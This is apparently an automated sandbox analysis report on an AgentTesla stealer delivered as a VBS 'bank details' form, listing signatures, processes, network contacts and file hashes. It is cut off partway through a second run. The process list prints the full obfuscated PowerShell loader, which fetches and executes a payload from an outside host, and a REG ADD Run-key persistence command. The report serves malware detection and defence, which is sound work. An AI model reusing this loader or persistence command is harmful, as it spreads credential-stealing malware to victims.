Malware Analysis Report

2024-11-30 07:20

Sample ID 240603-hj7k5sfc2t
Target Bank_Details_Form.vbs
SHA256 d16ea5d6d40c9020b99032eaefab9b62f3c63bae12d24103a6b10ac5a2dcd34c
Tags
agenttesla keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d16ea5d6d40c9020b99032eaefab9b62f3c63bae12d24103a6b10ac5a2dcd34c

Threat Level: Known bad

The file Bank_Details_Form.vbs was found to be: Known bad.

Malicious Activity Summary

agenttesla keylogger persistence spyware stealer trojan

AgentTesla

Blocklisted process makes network request

Checks computer location settings

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 06:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 06:47

Reported

2024-06-03 06:49

Platform

win7-20240220-en

Max time kernel

143s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bank_Details_Form.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\tonsillectomic = "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\\Codebtors\\').Typeregningens;%Rundsavsbladene% ($sartor)" C:\Windows\SysWOW64\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2560 set thread context of 776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1984 wrote to memory of 1036 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 1036 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 1036 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1036 wrote to memory of 2544 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1036 wrote to memory of 2544 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1036 wrote to memory of 2544 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1036 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1036 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1036 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1036 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2560 wrote to memory of 2456 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 2456 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 2456 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 2456 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2560 wrote to memory of 776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2560 wrote to memory of 776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2560 wrote to memory of 776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2560 wrote to memory of 776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2560 wrote to memory of 776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 776 wrote to memory of 2452 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 776 wrote to memory of 2452 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 776 wrote to memory of 2452 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 776 wrote to memory of 2452 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2452 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2452 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2452 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2452 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bank_Details_Form.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.innovativebuildingsolutions.in udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp

Files

memory/1036-4-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

memory/1036-5-0x000000001B620000-0x000000001B902000-memory.dmp

memory/1036-6-0x00000000022C0000-0x00000000022C8000-memory.dmp

memory/1036-7-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1036-8-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1036-9-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1036-11-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1036-10-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JQJZIJ3CO6XDSRHZNX19.temp

MD5 c7dea2eb516df78f4599bd2ee8e96725
SHA1 5a04043862d5f48115ab816c7c2c4b768ebc6741
SHA256 fec7bd0772416d47aec0a2c1780ada5234731df0eabb4074712bc4a0d51b8750
SHA512 ada7ad287d8da7a21d8289291a4ac474251027c99ee11f99e5386498265df4ca04117899e8586a59b090f08d82e415041436773c72521464096c1e0245c6f97a

C:\Users\Admin\AppData\Roaming\Skrmet.Kli

MD5 9916e5a5f7afe8c1f861f93999a875f3
SHA1 8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc
SHA256 97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df
SHA512 30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc

memory/1036-17-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/2560-18-0x0000000006720000-0x000000000A37C000-memory.dmp

memory/1036-19-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

memory/776-33-0x00000000008E0000-0x0000000001942000-memory.dmp

memory/776-34-0x00000000008E0000-0x0000000000920000-memory.dmp

memory/1036-35-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 06:47

Reported

2024-06-03 06:49

Platform

win10v2004-20240426-en

Max time kernel

148s

Max time network

154s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bank_Details_Form.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description Indicator Process Target
